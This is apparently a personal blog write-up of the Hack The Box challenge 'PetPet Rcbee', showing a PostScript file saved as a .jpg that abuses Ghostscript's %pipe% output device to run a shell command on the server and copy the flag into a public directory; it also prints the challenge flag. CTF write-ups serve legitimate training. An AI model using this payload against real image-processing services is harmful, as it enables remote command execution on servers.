PetPet Rcbee | HTB | Challenge
Hlo there !!
Welcome back to another blog, in this blog I’ll solve “PetPet Rcbee” a challenge of Hack the Box which was released on June 05, 2021.
So lets start by downloading & unzipping the file to our local machine…
These files are none of our use, so lets move forward towards the website …
This is the homepage of the website and there's a way to upload a file on the website. Let's confirm it by uploading a simple PNG image on the website….
Since doggo is my favorite, so I’ll upload a pic of him/her
Yup!! Pic of doggo uploaded successfully. This means that we can perform remote code execution on the website via a jpg/png/jpeg extension file.
After taking help of google and other sources I made script from which we can directly get the flag of the challenge …
%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%cat flag >> /app/application/static/petpets/flag.txt) currentdevice putdeviceprops
Copy and paste these codes in your favorite text editor or code editor and save it as remote_code.jpg or any other name of your choice…
Our next plan is to upload the image on the website…
In the above picture I had taken a screenshot after uploading the image so don't get confused here...
Now our image is uploaded successfully on the website so navigate to the directory and grab your flags …
http://URL:PORT/static/petpets/flag.txt
Flag : HTB{c0mfy_bzzzzz_rcb33s_v1b3s}
My previous ID “kshitizkr603” was banned by HTB — bots today for * reason.
Thanks for reading.
For any queries, just dm me on Instagram @ig._.anshu
